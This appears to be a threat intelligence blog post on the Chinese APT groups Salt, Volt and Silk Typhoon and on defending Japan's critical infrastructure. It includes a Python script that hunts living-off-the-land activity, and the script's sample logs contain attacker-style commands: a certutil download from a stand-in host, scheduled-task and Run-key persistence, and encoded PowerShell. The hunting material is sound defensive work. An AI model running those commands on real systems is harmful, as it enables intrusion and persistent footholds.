- Threat Intelligence
- May 21, 2025
China’s APT Threats to Japan’s Critical Infrastructure: Salt, Volt, and Silk Typhoon
What Japan’s defenders must know about China’s cyber espionage and infrastructure sabotage campaigns

China’s Cyber Warfare Strategy and APT Evolution
Cyber warfare is evolving rapidly, with Advanced Persistent Threats (APTs) becoming more sophisticated, stealthy, and destructive. Among the most concerning in recent years are three China-linked APT groups: Salt Typhoon, Volt Typhoon, and Silk Typhoon. Each works with distinct tactics and goals, yet collectively, these groups signal a broader shift in how nation-states conduct cyber operations.
In this post, we’ll analyse how these groups operate, what their activities reveal about China’s long-term cyber strategy, and how defenders can prepare for the next wave of cyber warfare.
APT Group Profiles: Salt, Volt, and Silk Typhoon Explained
Salt Typhoon: China’s Cyber Espionage Specialist
Salt Typhoon focuses on cyber espionage, targeting Western enterprises in sectors such as technology, defence, and telecommunications. It specialises in exploiting enterprise software vulnerabilities to gain long-term access to sensitive intellectual property and corporate secrets.
Volt Typhoon: The Stealthy Infrastructure Saboteur
Volt Typhoon, on the other hand, has a different mission – covertly infiltrating critical infrastructure to pre-position themselves for disruptive or destructive attacks. Unlike traditional APTs that rely on malware, Volt Typhoon utilises living-off-the-land (LOL) techniques, making detection much harder.
Silk Typhoon: APT Meets Cyber Crime
Silk Typhoon is a unique hybrid that blends state-sponsored cyber espionage with financially motivated cybercrime. Alongside traditional nation-state intelligence gathering, it conducts attacks for financial gain and targets organisations within the global IT supply chain.

Strategic Implications for Japan’s National Cyber Defence
For cyber threat practitioners, these groups illustrate the shift from espionage to an integrated model of cybercrime, intelligence collection, and operational disruption. Silk Typhoon exemplifies this evolution, seamlessly pivoting between data theft and financially motivated attacks. An attack today may be aimed at intelligence gathering, tomorrow financial extortion or market manipulation. Defenders must break out of siloed thinking—cyber threats are interconnected across economic, corporate, and national security landscapes.
“Stealth is now the norm. Sophisticated threat actors are employing living-off-the-land techniques, utilising built-in system tools to evade detection.”
Volt Typhoon’s operations reinforce that cyber warfare is already under way. These adversaries are embedding themselves within critical infrastructure, staying undetected for years and pre-positioning for future sabotage. The implications are severe: power grids, logistics, and communications could be compromised long before an attack is detected. Threat intelligence teams must transition from reactive defence to proactive hunting, with the goal of finding persistent, stealthy intrusions before they escalate.
“The notion of a secure perimeter is obsolete—the real threat may already be inside, hidden in plain sight.”
Supply chain exploitation is another growing challenge. Silk Typhoon has refined indirect compromise, targeting third-party vendors to gain access to high-value targets. Even organisations with strong internal security may find themselves breached through a compromised software update or trusted vendor. Robust cyber defence must extend beyond internal networks, focusing also on the threat from supply chain exploitation. Security teams must enforce strict vendor assessments, enhance supply chain security, and demand transparency in software dependencies.
Explore how Japan is shifting from compliance to capability in our post on Active Cyber Defence in Japan.
How to Detect and Defend Against APTs from China
Salt, Volt, and Silk Typhoon are not just isolated APTs—they are a coordinated, long-term strategy by China to blend espionage, infrastructure pre-positioning, and cybercrime for strategic advantage. Their operations signal a shift: cyber-attacks are no longer episodic—they’re part of a sustained influence campaign.
Proactive Defence: Turning Intelligence into Action
As threat analysts, we need to move past a reactive posture. Relying on perimeter defences is no longer sufficient—assume compromise and operate accordingly.
- Operationalise threat intelligence—Map IOCs and TTPs from these groups directly to your environment.
- Hunt continuously—Focus on persistence mechanisms, LOLBins, and lateral movement activity.
- Test your IR playbooks—Simulate long-term intrusions and stealthy C2 scenarios in red/blue team exercises.
- Push for visibility—Across endpoints, network, and third-party supply chains. You can’t defend what you can’t see.
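The hunting priorities in the list above (persistence mechanisms, LOLBins, lateral movement) can be turned into a first-pass hunt over process-creation telemetry. The script below is an added example, not code from NCD or from this post; it assumes Sysmon-style process-creation events exported from a SIEM as JSON lines with host, user, image, parent_image and command_line fields, and the sample events and rule names are constructed for illustration.

```python
"""First-pass hunt for living-off-the-land activity in process-creation logs.

Added example; assumes Sysmon-style process-creation events exported from a
SIEM as JSON lines with the fields host, user, image, parent_image and
command_line. All sample events below are constructed.
"""
import json
import re
from collections import defaultdict

# Built-in Windows binaries that are routinely abused for download, execution,
# persistence and lateral movement (the LOLBAS project maintains the full list).
LOLBINS = {
    "certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe",
    "netsh.exe", "powershell.exe", "bitsadmin.exe", "schtasks.exe", "reg.exe",
    "wscript.exe", "cscript.exe",
}

# Parents that should almost never launch a LOLBin: Office apps and IIS workers.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "w3wp.exe"}

# (rule name, image basename, command-line pattern); rule names are this example's own.
RULES = [
    ("certutil_download", "certutil.exe", re.compile(r"-urlcache|-decode", re.I)),
    ("encoded_powershell", "powershell.exe",
     re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("scheduled_task_persistence", "schtasks.exe", re.compile(r"/create", re.I)),
    ("run_key_persistence", "reg.exe", re.compile(r"CurrentVersion\\Run", re.I)),
    ("remote_wmi_exec", "wmic.exe", re.compile(r"/node:", re.I)),
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_event(line):
    """Parse one JSON log line; return None for malformed or incomplete events."""
    try:
        ev = json.loads(line)
    except json.JSONDecodeError:
        return None
    required = {"host", "user", "image", "parent_image", "command_line"}
    return ev if required.issubset(ev) else None


def evaluate(ev):
    """Return the rule names that fire for a single event."""
    image, parent = basename(ev["image"]), basename(ev["parent_image"])
    hits = []
    if image in LOLBINS and parent in SUSPICIOUS_PARENTS:
        hits.append("lolbin_from_unusual_parent")
    for name, binary, pattern in RULES:
        if image == binary and pattern.search(ev["command_line"]):
            hits.append(name)
    return hits


def hunt(lines):
    """Run every rule over the log lines; skip lines that do not parse."""
    findings = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        if ev is None:
            continue
        hits = evaluate(ev)
        if hits:
            findings.append({"line": n, "host": ev["host"], "user": ev["user"],
                             "image": basename(ev["image"]), "rules": hits})
    return findings


def summarise_by_host(findings):
    """Distinct techniques per host; hosts showing several techniques rank first for triage."""
    per_host = defaultdict(set)
    for f in findings:
        per_host[f["host"]].update(f["rules"])
    return sorted(((h, sorted(r)) for h, r in per_host.items()),
                  key=lambda item: (-len(item[1]), item[0]))


# Constructed sample telemetry: one JSON event per line, last line deliberately malformed.
SAMPLE_LINES = r"""
{"host": "WS-01", "user": "CORP\\akira", "image": "C:\\Windows\\System32\\certutil.exe", "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "command_line": "certutil.exe -urlcache -f http://example.invalid/p.txt p.txt"}
{"host": "WS-01", "user": "CORP\\akira", "image": "C:\\Windows\\System32\\schtasks.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "command_line": "schtasks /create /tn \"Updater\" /tr \"C:\\Users\\Public\\u.vbs\" /sc onlogon"}
{"host": "SRV-DB-02", "user": "CORP\\svc_backup", "image": "C:\\Windows\\System32\\reg.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "command_line": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d C:\\Users\\Public\\u.vbs"}
{"host": "SRV-DB-02", "user": "CORP\\svc_backup", "image": "C:\\Windows\\System32\\wbem\\wmic.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "command_line": "wmic /node:SRV-FILE-01 os get lastbootuptime"}
{"host": "WS-03", "user": "CORP\\yuki", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"}
{"host": "WS-01", "user": "CORP\\akira", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "command_line": "powershell.exe -enc VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIABoAGUAbABsAG8A"}
this line is not valid json and must be skipped
""".strip().splitlines()

if __name__ == "__main__":
    results = hunt(SAMPLE_LINES)
    for f in results:
        print(f"line {f['line']}: {f['host']} {f['user']} {f['image']} -> {', '.join(f['rules'])}")
    for host, rules in summarise_by_host(results):
        print(f"{host}: {len(rules)} distinct technique(s): {', '.join(rules)}")
```

The benign inventory script on WS-03 fires nothing because neither its parent nor its command line matches a rule, which is the point of pairing a LOLBin list with parent and command-line context rather than alerting on every PowerShell launch. Ranking hosts by the number of distinct techniques seen, rather than by raw hit count, surfaces the hosts where download, persistence and remote execution appear together, which is the pattern of a sustained intrusion rather than a one-off admin action.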
The threat is already embedded. The mission now is to detect, contain, and outpace the adversary before they activate.
Explore how AI is transforming security strategies in an earlier post, The Rise of AI-Driven Warfare: Securing Nations and Critical Infrastructure from Emerging Threats.

Threat Intelligence Analyst @ Nihon Cyber Defence
Turner brings years of experience with the UK Ministry of Defence and NATO-aligned operations and is an expert in high-stakes operational intelligence.